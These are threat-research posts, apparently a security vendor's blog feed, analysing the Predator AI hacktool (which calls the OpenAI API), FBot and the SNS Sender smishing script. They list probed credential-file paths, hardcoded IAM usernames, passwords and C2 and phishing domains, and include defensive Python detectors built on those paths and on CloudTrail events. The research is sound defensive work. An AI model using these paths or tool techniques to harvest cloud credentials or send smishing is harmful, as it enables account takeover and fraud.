a8e0b6fda4bc1bd93d2a0bc30e18c65eb7f07dec Teleram /lib/arm64-v8a/libcallrecfix.so
aacb4e5f9e6b516b52d0008f2e5f58c60b46610b Teleram /lib/armeabi-v7a/libcallrecfix.so
ae8d4853377f4a553ecad0c84398ef9dc8735072 Teleram /lib/x86/libcallrecfix.so
b9835174a9a4445dc4d5ff572a79c54f234120bf Santafi /lib/armeabi-v7a/libdalia.so
c0f4592df97073fb5021e2acee0a3763b8fbaf76 Teleram /lib/x86_64/libcallrecfix.so
c1c5a00b22e7d12e8a41d5d8fbe625ecb218fa7c Santafi /lib/arm64-v8a/libsonsod.so
c396327a2332bd6fbc771a97b5e0d4d1a43e8f72 APP-UPGRADE themed Skip Messenger APK
ce954dcc62f17f6e31bfa9164f5976740f1b127e APP-UPGRADE /arm64-v8a/libuoil.so
cfa5ef1bff2746407f96ab5c86b66ec5cf305e77 Santafi /lib/x86_64/libdalia.so
da690c4b1569e1f0b0734762c0f274e3ba33ded1 APP-UPGRADE /armeabi-v7a/libuoil.so
de92fb9af9d6e68a001b6263b9c3158325d77f99 Teleram /lib/arm64-v8a/librealm-jni.so
e05ce0496c6d20c24997c17a65c44ccd08cb2a10 APP-UPGRADE /armeabi-v7a/libcallrecfix.so
eb14e05364e675fcf03934be549ae96b36b12af0 Santafi /lib/x86/libdalia.so
f8adf63d34eb54121389b9847771d110978aec8e APP-UPGRADE /x86_64/libuoil.so
fb7b9681567478a660413ec591fc802e35a55b7e Santafi /lib/x86/libsonsod.so
Domain Notes
1058215140016-kv5c01acm9r7argbis96lmudg6p68koe.apps.googleusercontent.com Google Cloud content hostname used by APP-UPGRADE Skipped Messenger APK
1095841779797-idgdkor5mh0lbjeq5spcksbj7jpdlaj9.apps.googleusercontent.com Google Cloud web client hostname used by com.alied.santafi
314359296475-glearr20do927s2v75cgiocb585gqjgd.apps.googleusercontent.com Google Cloud web client hostname used by Teleram app
conner-margie[.]com C2 domain used by com.alied.santafi
danny-cartwright[.]firm[.]in C2 domain used by com.teleram.app APK
jolia-16e7b.appspot.com Google Storage bucket used by com.alied.santafi
luis-dubuque[.]in C2 domain used by APP-UPGRADE Skipped Messenger APK
rashonal.appspot.com Google Cloud web client hostname used by APP-UPGRADE Skipped Messenger APK
skippedtestinapp.firebaseio.com Firebase service for Skipped Messenger APKs
yellwo-473d0.appspot.com Google Storage bucket used by Teleram app

Predator AI | ChatGPT-Powered Infostealer Takes Aim at Cloud Platforms

7 November 2023 at 15:13

Executive Summary

  • SentinelLabs has identified a new Python-based infostealer and hacktool called ‘Predator AI’ that is designed to target cloud services.
  • The Predator AI developer implemented a ChatGPT-driven class into the Python script, which is designed to make the tool easier to use and to serve as a single text-driven interface between disparate features.
  • These advancements are not production ready, but demonstrate that actors can realistically use AI to improve their workflows by automating data enrichment and adding context to scanner results.

Background & Distribution

Predator AI is advertised through Telegram channels related to hacking. The main purpose of Predator is to facilitate web application attacks against various commonly used technologies, including content management systems (CMS) like WordPress, as well as cloud email services like AWS SES. However, Predator is a multi-purpose tool, much like the AlienFox and Legion cloud spamming toolsets. These toolsets share considerable overlap in publicly available code that each repurposes under its own brand, including the use of Androxgh0st and Greenbot modules.

Predator is an actively developed project. In September 2023, a member of the primary Telegram channel inquired about Predator adding a Twilio account checker, to which the developer replied they could deliver in about 2 weeks. In October, the developer posted an update showing the new Twilio checking feature. The version we analyzed has Twilio features, which suggests it is a recent build.

At the top of the script, there is a message from the developer which states that the tool is protected by copyright law. The message also has a disclaimer saying the tool is for educational purposes and the author does not condone any illegal use.

Developer’s message at the top of the Predator script

Targeting & Technical Details

Predator is a Python application with over 11,000 lines. The application runs entirely through a Tkinter-based graphical user interface (GUI): there is no standalone command line interface (CLI) mode, which distinguishes Predator from many similar tools. The Tkinter approach requires several JSON configuration files.

Predator GUI

The script has 13 global classes defined, which roughly segment the different features.

Class Name – Details
Predator – The largest class. Runs from the beginning of the script to line 7079.
Settings – Only two lines. Sets the UpdatesCheck variable to False and Password to “Predator123”.
Utility – Calls Windows commands to get the current window name and to check whether the current user is running as an administrator.
PumperSettings – Code that inflates the size of a file.
FakeErrorBuilder – Creates fake error messages that pertain to XSS testing on a Windows system.
StealerBuilder – Builds a configurable infostealer as a Windows Portable Executable (PE).
Translator – Translates the dialog boxes and menu items rendered in the Tkinter GUI. Supported languages are Arabic, English, Japanese, Russian, and Spanish.
NetGun – Handles web application security scans with options for proxies and custom wordlists.
CTkMessagebox & CTkListbox – Code that renders the graphical user interface (GUI) via Tkinter.
ThemeMaker – Custom color schemes for the GUI.
GPTj – A ChatGPT-enabled class. Queries the OpenAI API.
NetXplorer – Uses psutil and subprocess to query network status and system information.

Predator has features that can be used to attack many popular web services and technologies, including:

Service Provider – Details – Based In
Aimon – SMS marketing – Italy
Amazon Web Services (AWS) Simple Email Service (SES) – Email platform – United States
Aruba – Hosting – Italy
Clickatell – SMS marketing – South Africa, United States
ClickSend – SMS marketing – Australia
Twilio – SMS, Voice, Video communications – United States
Nexmo – Voice & SMS, acquired by Vonage – United States
OneSignal – SMS, Push Notifications – United States, United Kingdom
Openpay – Buy Now, Pay Later; ceased operations in February 2023 – Australia
PayPal – Live environment & Sandbox API keys targeted – United States
Plivo – Voice & Messaging – United States
Razorpay – Payment Processor – India
Skebby – SMS Marketing – Italy
Stripe – Payment Processor – United States
Telnyx – Voice, Messaging, Fax – United States
Textlocal – SMS Marketing – United Kingdom
Valueleaf – Marketing – India
XGATE – Marketing & CRM – Hong Kong

Predator’s web application attacks look for common weaknesses, misconfigurations, and vulnerabilities: permissive Cross Origin Resource Sharing (CORS) policies, exposed Git configuration, PHPUnit Remote Code Execution (RCE), SQL injection (SQLi), and Cross-Site Scripting (XSS).

The following technologies are targeted:

  • Drupal
  • Joomla
  • Laravel
  • Magento
  • OpenCart
  • osCommerce
  • PrestaShop
  • vBulletin
  • WordPress

Variables that hold output from web service scanning features

Laravel environment parsing

Predator AI | The GPTj Class

The GPTj class contains the ‘Predator AI’ feature, which is a chat-like text processing interface that connects the user to Predator’s features. The actor designed Predator AI to try to find a local solution first before querying the OpenAI API, which reduces the API consumption.

This class searches the user’s input for strings associated with a known use case centered around one of Predator’s web application and cloud service hacking tools. There are more than 100 cases where Predator handles the data internally or through a free third-party service, such as an IP reputation lookup service. This class contains several partially implemented utilities related to AWS SES and Twilio, as well as utilities to get information about IP addresses and phone numbers.

Predator queries the ChatGPT API only when no local case handles the input. Several driving functions defined inside this class handle the activity flow or enable ChatGPT interaction:

generate_text

This function requires two arguments: prompt and api_key. The function uses the OpenAI model text-davinci-003 with a maximum token length of 400 and temperature 0.7. The code makes a POST request to https://api.openai.com/v1/completions and returns the result for handling via the Tkinter UI.

generate_text function in GPTj class

Ai_Backend

This function takes one argument, usrMsg. This code contains the hardcoded OpenAI API key and calls the generate_text function on the usrMsg object with the API Key. The OpenAI server response is returned.

aiRes

This function takes two arguments, msg and patch. It calls Ai_Backend (and therefore OpenAI) only when the patch argument equals 0 or is not given. Predator has 106 references to aiRes, and each passes a non-zero patch value. This means the OpenAI functionality is designed to handle edge cases that the script does not handle natively. The function checks whether a patch is present and modifies the UI result based on the length of the response from OpenAI or of the patched result.

ChatEvent

This function contains the modular utilities offered by the class. It takes no arguments.

ChatEvent function’s help message highlights the different utilities it offers

When the user command is not routed to ChatGPT, several functions handle the request locally or through alternate API calls. We break them down by category.

AWS Features

Though the core utility is present, not all of the following functions are called inside the script, suggesting the developer is still working on these features. This code has significant overlap with AlienFox, Legion, and other earlier iterations of these tools. Based on what is currently in the script, there is no indication that AWS-related data would be sent to the ChatGPT service. Instead, the script parses the input for the presence of aws.c and calls the following functions when present.

If these features were fully implemented, the attacker could use them to perform the following when they have valid AWS account credentials:

  • Check for all email accounts in an AWS SES environment.
  • Check send quotas.
  • Create a new account, assign administrative privileges, and delete the old account.

TwilioChecker

This function queries https://api.twilio.com/2010-04-01/Accounts.json with SID and token as arguments. If "message":"Authenticat" is not in the response, the script parses the response for the fields status, type, and balance. If “status” is not in the response, the script parses the response for the balance and currency fields. If status returns as active, the script logs the values of SID, TOKEN, TYPE, STATUS, and BALANCE to the file Result/TwilioChecker/result.txt.

GhostTrack

There are several other utilities nested under a function named GhostTrack.

  • IP_Track: Collects information about a given IP address via the ipwho[.]is service.
  • phoneGW: Uses the phonenumbers Python module to format input phone numbers in a standard way and check information about the phone number, such as whether it is a landline or mobile number.
  • TrackLu: Checks one of 23 social media services for a username matching the input argument. The function checks for a 200 status code, which is not effective in the case of private profiles and there are likely many site-specific edge cases.
  • checkIP: Queries api.abuseipdb[.]com to collect information about the given IP address related to abuse metrics, such as an abuse confidence score.

The author included several conditions to handle a user query about the nature of the chat utility, along with a statement that claims the author spent three days developing this feature.

Message inside GPTj class

A query given through the Predator AI interface and the response from ChatGPT fed into the UI

StealerBuilder

This class contains configuration variables to build an infostealer. On October 16 2023, the project developer posted a video about Predator that shows the Stealer build process. A user asked if the resulting executable is fully undetectable, to which the developer replied, “Of course.”

The stealer can be configured to use Discord or Telegram webhooks for C2. The operator can specify an existing executable to insert the infostealer code into. During testing, we were unable to successfully use this feature as the required configuration files were not available. The features visible in the script we analyzed indicate that Predator parses files from a Scripts directory and uses them to build either a Windows Portable Executable (PE) file or a Python script version of the stealer module.

StealerBuilder configuration variables

Conclusion

The discovery of Predator AI is an entirely expected evolution that had not previously been documented in the hacktool space. Since the recent wave of AI technologies entered the public domain, security professionals have asked whether this technology was already aiding threat actors and how it could be used to scale their operations. Several projects, like BlackMamba, ultimately delivered less than their hype promised. Predator AI is a small step forward in this space: the actor is actively working on making a tool that can utilize AI.

While Predator AI is likely somewhat functional, this integration does not substantially increase an attacker’s capability. The feature has not yet been advertised on the actor’s Telegram channel, and there are likely many edge cases that make it unstable and potentially expensive.

As with other cloud service attack tools, organizations can reduce the impact of Predator by keeping web services patched and up to date and by restricting internet exposure to what is necessary. Use cloud security posture management (CSPM) tools to validate that configurations are secure. Consider dedicated logging and detections for anomalous behaviors on cloud service provider (CSP) resources, such as a new user account being added and another user account being deleted immediately afterwards.

Indicators of Compromise

SHA-1 Hash

88d40f86eefee5112515b73cce2d2badb7f49ffd – main.py Predator Python script

Hardcoded Strings

  • “jSDSgnditikunggobloktolol” – hardcoded AWS account name string
  • “titid” – hardcoded username in AWS GPT functionality
  • “Adminn” – hardcoded username in AWS GPT functionality
  • “Predator123” – hardcoded password from the Settings class
  • “admainkontolpaslodsajijsd21334#1ejeg2shehhe” – hardcoded password for ‘Kontolz’ user account
  • arn:aws:iam::320406895696:user/Kontolz – example ARN for Kontolz user

Exploring FBot  | Python-Based Malware Targeting Cloud and Payment Services

11 January 2024 at 13:55

Executive Summary

  • FBot is a Python-based hacking tool distinct from other cloud malware families, targeting web servers, cloud services, and SaaS platforms like AWS, Office365, PayPal, Sendgrid, and Twilio.
  • FBot does not utilize the widely-used Androxgh0st code but shares similarities with the Legion cloud infostealer in functionality and design.
  • Key features include credential harvesting for spamming attacks, AWS account hijacking tools, and functions to enable attacks against PayPal and various SaaS accounts.
  • FBot is characterized by a smaller footprint compared to similar tools, indicating possible private development and a more targeted distribution approach.

Overview

The cloud hacktool scene is highly intertwined, with many tools relying on one another’s code. This is particularly true for malware families like AlienFox, Greenbot, Legion, and Predator, which share code from a credential scraping module called Androxgh0st.

We identified a tool that is related but distinct from these families. FBot is a Python-based attack tool with features to target web servers and cloud services as well as Software-as-a-Service (SaaS) technologies, including:

  • Amazon Web Services (AWS)
  • Office365
  • PayPal
  • Sendgrid
  • Twilio

FBot is unique in that it apparently does not adapt the Androxgh0st code so common among similar hacktools, even though the earliest reference to FBot is one year more recent than the first sighting of Androxgh0st. However, there are several connections to the Legion cloud infostealer, making it likely that the Legion maintainer adapted code from FBot into their tool.

FBot is primarily designed for actors to hijack cloud, SaaS, and web services. There is a secondary focus on obtaining accounts to conduct spamming attacks. Actors can use the credential harvesting features to obtain initial access, which they can sell to other parties.

The tool contains assorted utilities, including an IP address generator and port scanner. There is also an email validator function, which uses an Indonesian technology service provider to validate email addresses.

FBot menu and list of features

AWS Targeting

FBot has three functions dedicated to AWS account attacks. The first is an AWS API Key Generator, handled by function aws_generator, which generates a random AWS access key ID by appending 16 randomly selected alphabetic characters to the standard AKIA prefix. Then, it generates a secret key from 40 randomly selected alphabetic characters.

Although FBot apparently does not adopt the Androxgh0st modules, the same feature was highlighted in research on the Legion stealer as well as an older Androxgh0st variant, and it has not changed significantly. We agree with those researchers’ conclusion that this feature is unlikely to succeed at brute forcing account credentials, given the number of possible access key and secret key combinations.

The second AWS feature is a Mass AWS Checker, handled by function aws_checker. This function checks for AWS Simple Email Service (SES) email configuration details, including the maximum send quota and rate, as well as how many messages have been sent in the past 24 hours, likely to maximize spamming efforts against the targeted account. It also creates a new user account with the username iDevXploit and the password MCDonald2021D#1337 and attaches the AdministratorAccess policy to elevate privileges for the new account. Unlike other cloud attack tools such as AlienFox, FBot does not delete the compromised account that the attacker used to gain access.

The third and final AWS feature is an AWS EC2 Checker, with the description Get EC2 VCPU Limit, which is handled by function ec_checker. This function reads a list of AWS identities from a text file in the format of AccessKey|SecretKey|Region. The script uses these values to check the targeted account’s EC2 service quotas. The FBot menu highlights that this can be used to check vCPU details, although the output is less straightforward. The query results describe the account’s EC2 configurations and capabilities, such as what types of EC2 instances can run. The script iterates through a list of specified AWS regions, runs the query again for each region, and logs the result to a text file.

Example EC2 quota output captured by FBot’s ec_checker function

SaaS & Payment Services Targeting

FBot has several features that target payment services as well as SaaS configurations.

The PayPal Validator feature is handled by paypal_validator. This function validates PayPal account status by contacting a hardcoded URL with an email address read from an input list. The email is added to the request in the customer details section to validate whether an email address is associated with a PayPal account.

The script initiates the Paypal API request via the website hxxps://www.robertkalinkin.com/index.php, which is a Lithuanian fashion designer’s retail sales website. Interestingly, all identified FBot samples use this website to authenticate the PayPal API requests, and several Legion Stealer samples do as well.

PayPal Validator crafts the request to this site with a fake item ID as well as phony customer details, then parses the response for a status message indicating success.

PayPal validation request data

FBot also targets several SaaS platforms, including Sendgrid and Twilio. The Sendgrid feature is a Sendgrid API Key Generator, which generates a Sendgrid key formatted like:

SG.{22 characters from [A-Z0-9-_]}.{1 more character from previous range}

The Twilio feature takes the Twilio SID and Twilio Auth Token as input, separated by a pipe. The function then checks the SID and auth token combination for details about the account, including the balance and its currency, and a list of phone numbers connected to the account.

Web Framework Features

FBot has features for validating if URLs host a Laravel environment file and for extracting credentials from those files. The Hidden Config Scanner feature takes a URL as input and crafts an HTTP GET request to several PHP, Laravel, and AWS-related URIs where configuration values may be stored, including:

  • _profiler/phpinfo
  • .env
  • .env.bak
  • aws.yml
  • aws/credentials
  • config.js
  • config/aws.yml
  • info.php
  • phpinfo
  • phpinfo.php

The response is parsed for keys and secrets related to the following services and the result is written to a text file:

  • AWS
  • Coinpayments
  • DB_USERNAME (generic database)
  • Ionos
  • MAIL_PASSWORD (generic SMTP)
  • Mailgun
  • MandrillApp
  • Office365
  • Plivo
  • Sendgrid
  • Twilio
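The URIs listed above are also what a defender can look for in web server access logs. The following Python is an added example, not FBot’s code: it parses constructed combined-format access log lines, flags requests for those configuration paths, and separates mere probing from actual exposure (a 2xx response to one of the paths). The IP addresses, timestamps and the burst threshold are constructed assumptions.

```python
"""Flag web-server requests probing for exposed PHP/Laravel/AWS config files.

Added example for this writeup (not FBot's code): the URI list is the one the
article attributes to FBot's Hidden Config Scanner; the log lines are constructed.
"""
import re
from collections import defaultdict

# URIs the scanner requests, normalised without a leading slash.
CONFIG_PROBE_PATHS = {
    "_profiler/phpinfo", ".env", ".env.bak", "aws.yml", "aws/credentials",
    "config.js", "config/aws.yml", "info.php", "phpinfo", "phpinfo.php",
}

# Apache/nginx "combined" format: ip - - [ts] "METHOD path HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: a scanner-like burst from 198.51.100.7 (the .env request
# succeeds, i.e. the file is exposed) plus benign traffic from 203.0.113.5.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:09:14:02 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Jan/2024:09:14:10 +0000] "GET /.env HTTP/1.1" 200 812 "-" "python-requests/2.31"
198.51.100.7 - - [10/Jan/2024:09:14:10 +0000] "GET /.env.bak HTTP/1.1" 404 153 "-" "python-requests/2.31"
198.51.100.7 - - [10/Jan/2024:09:14:11 +0000] "GET /aws/credentials HTTP/1.1" 404 153 "-" "python-requests/2.31"
198.51.100.7 - - [10/Jan/2024:09:14:11 +0000] "GET /_profiler/phpinfo HTTP/1.1" 404 153 "-" "python-requests/2.31"
198.51.100.7 - - [10/Jan/2024:09:14:12 +0000] "GET /phpinfo.php?x=1 HTTP/1.1" 403 199 "-" "python-requests/2.31"
203.0.113.5 - - [10/Jan/2024:09:14:30 +0000] "GET /css/app.css HTTP/1.1" 200 9021 "-" "Mozilla/5.0"
"""


def normalise_path(raw):
    """Strip the query string and leading slash: '/phpinfo.php?x=1' -> 'phpinfo.php'."""
    return raw.split("?", 1)[0].lstrip("/")


def find_probes(log_text):
    """Return one dict per request whose path is a known config-probe URI."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise_path(m["path"])
        if path in CONFIG_PROBE_PATHS:
            hits.append({"ip": m["ip"], "path": path, "status": int(m["status"])})
    return hits


def summarise(hits, burst_threshold=3):
    """Group hits by source IP: distinct probe paths, which ones answered 2xx
    (really exposed), and whether the IP looks like a scanner (>= threshold)."""
    by_ip = defaultdict(lambda: {"paths": set(), "exposed": set()})
    for h in hits:
        by_ip[h["ip"]]["paths"].add(h["path"])
        if 200 <= h["status"] < 300:
            by_ip[h["ip"]]["exposed"].add(h["path"])
    return {
        ip: {
            "probe_count": len(info["paths"]),
            "scanner_like": len(info["paths"]) >= burst_threshold,
            "exposed": sorted(info["exposed"]),  # 2xx means the file is reachable
        }
        for ip, info in by_ip.items()
    }


if __name__ == "__main__":
    for ip, result in summarise(find_probes(SAMPLE_LOG)).items():
        print(ip, result)
```

An entry with a non-empty exposed list is the one to act on first: the scanner found a readable configuration file rather than just probing for one.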

FBot also targets several popular Content Management Systems (CMS). The function cms_scanner contains a map of CMS and web frameworks to regular expressions (regex) associated with the service. The program creates a request to the targeted URL and parses the response for the following technologies:

  • Codeigniter
  • Discuz
  • Drupal
  • Esportsify
  • FluxBB
  • Invision
  • Jive
  • Joomla
  • Laravel
  • Lithium
  • Magento
  • MediaWiki
  • Moodle
  • Ning
  • OpenCart
  • osCommerce
  • phpBB
  • PrestaShop
  • vBulletin
  • Whmcs
  • WordPress
  • YetAnotherForum
  • ZenCart
  • Zimbra

Taxonomy

FBot relies on configuration values to be fed to it through a configuration file (.ini), or through headers that initiate the main class. We identified one version that is compiled as a Windows executable.

The string iDevXploit is present across all samples: this handle is credited as the author in the main class. Additionally, the aws_checker function leaves artifacts in targeted AWS consoles: when FBot creates a new user in the AWS account, the username iDevXploit is consistent across samples, along with the password MCDonald2021D#1337.

Unlike many similar cloud hacktools, FBot does not contain references to the open-source Androxgh0st code found in tools like AlienFox, GreenBot, and Predator. The logic implemented is very similar in that both Androxgh0st and FBot parse environment configuration files for credentials related to similar mail & cloud services, but the implementation is different and no code seems to be directly borrowed.

There is considerable overlap with the Legion cloud infostealer in how the tools scrape URLs for PHP configuration. However, FBot is much smaller and less fully featured than Legion, with FBot samples weighing in at approximately 200 KB and Legion ranging from 800-1200 KB in size.

Conclusion

FBot demonstrates another tool family that continues the trend of adopting cloud attack tool code from one tool into another, while maintaining its own distinct flavor. We have seen samples spanning July 2022 to January 2024, showing there is continued proliferation of this tool. However, there are relatively few changes across versions and it is unclear whether this is actively maintained.

As of this writing, we are unable to identify a distribution channel dedicated to FBot, which differentiates the tool from other cloud infostealers often sold on Telegram. The bot has references to buffer_0x0verfl0w, a Telegram channel associated with various crimeware that has since been retired. However, we found indications that FBot is the product of private development work, so contemporary builds may be distributed through a smaller scale operation. This aligns with the theme of cloud attack tools being bespoke ‘private bots’ tailored for the individual buyer, which is a theme prevalent among AlienFox builds.

Organizations should enable multi-factor authentication (MFA) for AWS services with programmatic access. Create alerts that notify security operations teams when a new AWS user account is added to the organization, as well as alerts for new identities added or major configuration changes to SaaS bulk mailing applications where possible.

Indicators of Compromise

SHA1 – Notes
1ad78e99918fd66ed43d42a93d2f910a2173b3c5 – Bot.py, January 2024 version of FBot
2becd32162b2b0cb1afc541e33ace3a29dad96f1 – April 2023 version of FBot
8ba3fca4deada6dbdc94b17a0c3c55a0b785331e – Bot.py, July 2022 version of FBot

Strings – Notes
iDevXploit – Hardcoded AWS IAM username
MCDonald2021D#1337 – Hardcoded AWS IAM user password

SNS Sender | Active Campaigns Unleash Messaging Spam Through the Cloud

15 February 2024 at 13:55

Executive Summary

  • SNS Sender is a script that enables bulk SMS spamming using AWS SNS, aka Smishing, a previously unseen technique in the context of cloud attack tools.
  • The script author is currently known by the alias ARDUINO_DAS and is prolific in the phish kit scene.
  • The script requires valid AWS SNS credentials compromised from an environment not subject to the SNS sandbox restrictions.
  • We identified links between this actor and numerous phishing kits used to target victims’ personally identifiable information (PII) and payment card details.
  • The smishing scams often take the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery.

Overview

A common thread between businesses and threat actors is that both are moving workloads previously handled by traditional web servers to the cloud. SentinelLabs has identified one example of this in the form of SNS Sender, a Python script that uses AWS Simple Notification Service (SNS) to send bulk SMS messages for the purpose of spamming phishing links, aka Smishing.

SNS Sender is the first script we encountered using AWS SNS to send spam texts. The script requires access to an AWS account in which the service was already provisioned, configured, and enabled. By default, AWS accounts are subject to restrictions through a feature called the SNS sandbox. These restrictions can be removed if the customer spends $1 and provides a viable use case to AWS support, who manually review such requests. While other tools like AlienFox have used business to customer (B2C) communications platforms such as Twilio to conduct SMS spamming attacks, we are unaware of existing research that details tools abusing AWS SNS to conduct such attacks.

We identified links between the actor behind this tool and many phishing kits used to target victims’ personally identifiable information (PII) and payment card details under the guise of a message from the United States Postal Service (USPS) regarding a missed package delivery. We believe this actor is using cloud services to send bulk SMS phishing messages, though they may still be testing the tool based on some questionable programming choices.

Script Analysis

SNS Sender is a script that enables bulk SMS spamming using AWS SNS. The script requires a list of phishing links named links.txt in its working directory. SNS Sender also takes several arguments that are entered as input:

  • A text file containing a list of AWS access keys, secrets, and region delimited by a colon
  • A text file containing a list of phone numbers to target
  • A sender ID, similar to a display name for a message
  • The message content

SNS Sender inputs and outputs

The send_sns_message function sets up the AWS boto3 client–an interface between the Python script and the AWS SNS backend–to send the SMS messages. The boto3 client variables are obtained through the arguments that the script user provided.

The sender ID variable is an interesting inclusion. According to AWS documentation, this variable is optional and is supported in some countries. In the United States, carriers do not support sender IDs, whereas in India, they are mandatory. The inclusion of a sender ID contrasts with the actor’s association with USPS-themed phishing kits targeting Americans. The oversight may indicate the actor is not familiar with this exception and likely resides in a country where the sender ID is commonplace.

SNS Sender establishes a while loop that iterates through the list of AWS credentials and regions. The script replaces any occurrences of the string linkas in the message content variable with a URL from the links.txt file, which weaponizes the message as a phishing SMS. The link is selected randomly using the Python random library’s choice method.

The script tracks how many AWS access key pairs have been used through the variable a and how many phone numbers have been used through the variable y, both of which are initialized to 0 and incremented by 1 on each loop iteration. Each message is sent using the credentials from one line of the AWS access key pair list, and the counters ensure that the next line is used for the subsequent message.

To run at scale, the list would need to be incredibly long, and likely repeat access key & secret pairs, making this a coding method with questionable efficacy.

Phishing Kits

When investigating the handle ARDUINO_DAS, we identified more than 150 phishing kit files containing references to the actor. More than half of the kits are USPS-themed. The assets in these archives are similar in name to the URIs present in several recent Smishing campaigns using a missed package delivery lure. We believe that the actor abandoned the ARDUINO_DAS handle in 2023 after accusations that the actor scammed buyers. However, some recently circulated phishing kits still reference this handle, which may make it an artifact of actors using the phishing kit.

Due to the link between ARDUINO_DAS and USPS phishing, we explored several active campaigns circulating through early January 2024, hosted on hxxps://usps[.]mytrackingh[.]top and hxxps://u-sipsl[.]cc. Both sites host a USPS-themed phishing site with a flow like:

  1. Landing Page: Explains to the visitor that their USPS package is unable to be delivered. The “Click Update” button leads to the next step.
  2. Tracking Page: This page looks like USPS tracking details, but it prompts the victim to enter their name, physical address, phone number, and email address.
  3. Card Verification Page: This page prompts the user to enter a credit card number for a $0.30 redelivery fee.
  4. The server forwards the details to a card checker, which is likely run through a Telegram service.

Landing page for phishing flow

PII theft form

Credit card theft form

Conclusion

Actors are continuously finding new tools and platforms they can use to conduct their attack of choice, and SNS Sender is no exception. Spammers have used mega tools like AlienFox and Predator to target bulk mail services as well as business communications services. Other researchers have detailed which APIs have been used during in-the-wild AWS SNS abuse attacks, as well as enumeration routes actors may take to verify a targeted environment’s SNS capabilities. SNS Sender provides a glimpse into how actors conduct these attacks.

SNS Sender represents a narrower approach that relies on the actor having access to a properly configured AWS SNS tenant. Using AWS presents a challenge for this actor: AWS does not allow SMS notifications via SNS by default. For this feature to work, the tenant needs to be removed from the SNS sandbox environment. This is an update from previous research, at which time AWS automatically allowed accounts to send to 10 destination numbers while in the SNS sandbox.

Organizations using AWS SNS can protect themselves by reviewing the SNS documentation for the latest information. AWS has shared guidance for organizations to learn more about the SNS sandbox and how to change sending limits. Identity and Access Management (IAM) administrators should review identity best practices to optimize their organization’s security posture.
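Both tools in this series leave CloudTrail evidence a defender can alert on: FBot’s aws_checker creates the iDevXploit IAM user and attaches AdministratorAccess, and SNS Sender issues one SNS Publish call per message while rotating through access key pairs. The following Python is an added example, not code from either tool; it runs both detections over constructed records whose layout only approximates CloudTrail’s, with assumed IP addresses, access key IDs and thresholds.

```python
"""Detect the two CloudTrail patterns described in this writeup: FBot-style IAM
persistence (CreateUser + AdministratorAccess) and SNS Sender-style bulk SMS
Publish calls spread across many access keys.

Added example, not code from either tool. The events are constructed and only
approximate CloudTrail's record layout (eventSource, eventName, requestParameters).
"""
from collections import defaultdict

# Indicator from the FBot analysis: the IAM username aws_checker creates.
KNOWN_BAD_USERNAMES = {"iDevXploit"}
ADMIN_POLICY_SUFFIX = ":policy/AdministratorAccess"


def ev(source, name, ip, key, **params):
    """Build a minimal CloudTrail-like record (constructed sample data)."""
    return {"eventSource": source, "eventName": name, "sourceIPAddress": ip,
            "userIdentity": {"accessKeyId": key}, "requestParameters": params}


SAMPLE_EVENTS = [
    ev("iam.amazonaws.com", "CreateUser", "198.51.100.7", "AKIAEXAMPLE00000001",
       userName="iDevXploit"),
    ev("iam.amazonaws.com", "AttachUserPolicy", "198.51.100.7", "AKIAEXAMPLE00000001",
       userName="iDevXploit", policyArn="arn:aws:iam::aws:policy/AdministratorAccess"),
    ev("iam.amazonaws.com", "CreateUser", "203.0.113.5", "AKIAEXAMPLE00000002",
       userName="ci-deploy"),
    ev("iam.amazonaws.com", "AttachUserPolicy", "203.0.113.5", "AKIAEXAMPLE00000002",
       userName="ci-deploy", policyArn="arn:aws:iam::aws:policy/ReadOnlyAccess"),
] + [
    # SNS Sender moves to the next credential pair for every message it sends.
    ev("sns.amazonaws.com", "Publish", "198.51.100.9", f"AKIAEXAMPLE1000000{i}",
       phoneNumber=f"+15550100{i:03d}")
    for i in range(6)
] + [
    # Legitimate topic publish from an application, not a direct-to-phone SMS.
    ev("sns.amazonaws.com", "Publish", "203.0.113.5", "AKIAEXAMPLE00000003",
       topicArn="arn:aws:sns:us-east-1:123456789012:alerts"),
]


def iam_persistence_alerts(events):
    """Every CreateUser is reportable, as the FBot writeup recommends; severity is
    raised for the known FBot username or for an AdministratorAccess attachment."""
    alerts = []
    for e in events:
        if e["eventSource"] != "iam.amazonaws.com":
            continue
        p = e["requestParameters"]
        if e["eventName"] == "CreateUser":
            sev = "high" if p.get("userName") in KNOWN_BAD_USERNAMES else "medium"
            alerts.append((sev, "CreateUser", p.get("userName")))
        elif (e["eventName"] == "AttachUserPolicy"
              and p.get("policyArn", "").endswith(ADMIN_POLICY_SUFFIX)):
            alerts.append(("high", "AttachUserPolicy:AdministratorAccess", p.get("userName")))
    return alerts


def sms_spam_alerts(events, min_messages=5, min_distinct_keys=3):
    """Group direct-to-phone SNS Publish calls by source IP. Many messages sent
    under many different access keys from one IP matches the rotating loop."""
    per_ip = defaultdict(lambda: {"messages": 0, "keys": set()})
    for e in events:
        if (e["eventSource"] == "sns.amazonaws.com" and e["eventName"] == "Publish"
                and "phoneNumber" in e["requestParameters"]):
            per_ip[e["sourceIPAddress"]]["messages"] += 1
            per_ip[e["sourceIPAddress"]]["keys"].add(e["userIdentity"]["accessKeyId"])
    return sorted(ip for ip, s in per_ip.items()
                  if s["messages"] >= min_messages and len(s["keys"]) >= min_distinct_keys)


if __name__ == "__main__":
    print(iam_persistence_alerts(SAMPLE_EVENTS))
    print(sms_spam_alerts(SAMPLE_EVENTS))
```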

Desire for recognition presents operational security challenges for actors developing tools for the opportunistic cloud hacking scene. The practice of actors including their handle in the script is ubiquitous among cloud hack tools, enabling researchers to form a point of attribution even when delineating the tool families becomes challenging due to extensive overlap.

Indicators of Compromise

8fd501d7af71afee3e692a6880284616522d709e – sns_sender.py, SNS Sender

Phishing URLs

hxxps[:]//perwebsolutions[.]com/js/
hxxps[:]//usps[.]mytrackingh[.]top
hxxps[:]//u-sipsl[.]cc

Phish Kit Archives

